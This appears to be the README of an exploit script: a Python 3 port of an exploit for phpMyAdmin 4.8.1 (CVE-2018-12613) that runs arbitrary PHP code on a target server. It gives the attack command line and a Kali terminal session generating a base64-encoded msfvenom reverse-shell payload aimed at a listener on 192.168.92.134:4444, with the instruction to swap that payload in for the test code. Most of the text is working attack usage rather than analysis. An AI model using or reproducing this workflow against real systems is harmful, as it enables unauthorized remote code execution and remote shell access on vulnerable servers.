Modified standalone exploit ported to Python 3. Tested on Python 3.7.3, phpMyAdmin 4.8.1 running on Ubuntu 16.04 Works on Linux only. Original exploit by SSD. All credits to them.
- Added function to exit if provided phpMyAdmin username/password is correct
- Added function to check if version is vulnerable (4.8.0 or 4.8.1)
- Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See this.
python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”
Results of php code stored in results.html
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
Use the msfvenom
php payload in place of phpcredits();
above
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php
eval(base64_decode(ICAg...gfQo));